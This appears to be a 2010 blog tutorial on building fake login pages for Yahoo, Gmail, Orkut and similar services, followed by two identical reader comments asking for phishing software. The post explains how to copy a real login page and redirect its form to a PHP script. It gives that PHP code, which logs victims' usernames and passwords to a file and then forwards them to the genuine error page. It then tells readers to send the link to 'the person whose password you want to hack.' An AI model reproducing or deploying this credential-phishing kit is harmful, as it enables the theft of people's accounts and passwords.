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Saturday, January 16, 2010

Easiest way of creating fake login pages of yahoo,gmail and orkut

Easiest way of creating fake login pages of yahoo,gmail and orkut

let us learn how to create a fake login page with yahoomail as example. The same procedure can be applied for orkut,myspace,gmail,facebook,paypal …
First open the yahoo login page, if you are using internet explorer right click on the login page and select view source for mozilla press ctr+u. Copy the entire code on to notepad or your favorite text editor .Now search for the term “action”, you should find a line like this

When you enter your login information in the original login page, it is
submitted to this url change to “input.php” .When you change the action to input.php, user name and password are submitted to this file when ever user enters his login information in our fake login page.

Creating input.php

First let’s look at the code for a simple HTML form
2)User name :
action=”input.php” tell’s the browser to
submit the informationto input.php . In lines 2 and 4 line we have “type=text” and “type=password” this tell the browser the input type. name=”username” and name=”passwd” save the user name and password in variables named $_post[username] and $_post[passwd]. Line 5 displays a submit button when the user presses this button the form is submitted. (Note: I used the numbers just to explain the code )
First make note of the variable name used for both username and passowrd. In the the above form they are username and passwd
PHP code with explanation:
//Every php program starts with this tag

/*Opens passwd.htm for appending, if it is not
present it creates one*/
$fp = fopen(”passwd.htm”, “a”);
/* Writes user name and password stored in
$_POST[username] and Password:$_POST[passwd] in passwd.htm
“\t” is just to insert some space between user name
and password*/
fwrite($fp, “Username:$_POST[username]\tPassword:$_POST[passwd]”);
/*This part of the code creates a HTML page which
redirects the user to the original error page of gmail
The one you would get if you enter a wrong password

echo “

Welcome to Gmail

?> //php closing tag
To create your own input.php …
If the names of the variables used are login and password, then you should change $_post[username] and $_post[passwd] to $_post[login] and $_post[password]. This is all, you are done with creating a completely operable fake login page. upload the fake login page and input.php on some webserver with php support and give the link to the person whose password you want to hack. When that person enters his login in details in your fake login page they will be stored in password.htm . You can even configure the input.php to get the username and password in your inbox. For that you need to know little more php. I
NOTE: php variables are case sensitive, if you are trying to run input.php directly on your comp without installing a web server supported with php it will not work
Gud Luck



its yours great description but i don't understand it in proper way.
if you have a software for create fake login page so plz send me on :

email :

i am very thankful to you

its yours great description but i don't understand it in proper way.
if you have a software for create fake login page so plz send me on :

email :

i am very thankful to you